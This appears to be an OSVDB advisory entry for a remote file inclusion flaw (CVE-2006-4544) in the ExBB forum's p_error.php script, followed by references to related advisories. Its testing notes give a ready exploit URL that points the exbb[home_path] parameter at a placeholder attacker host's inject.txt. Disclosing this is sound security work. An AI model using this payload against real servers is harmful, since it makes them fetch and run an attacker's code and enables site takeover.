ExBB p_error.php exbb[home_path] Variable Remote File Inclusion

2006-08-30T23:06:11
ID OSVDB:29877
Type osvdb
Reporter OSVDB
Modified 2006-08-30T23:06:11

Description

Manual Testing Notes

http://[target]/[exbb_path]/modules/punish/p_error.php?exbb[home_path]=http://[attacker]/inject.txt?

References:

Vendor URL: http://www.exbb.net/ Security Tracker: 1016773 Related OSVDB ID: 29878 Related OSVDB ID: 29876 Related OSVDB ID: 29874 Related OSVDB ID: 29873 Related OSVDB ID: 29875 Related OSVDB ID: 29879 Other Advisory URL: http://advisories.echo.or.id/adv/adv46-matdhule-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0553.html Keyword: ECHO_ADV_4606 CVE-2006-4544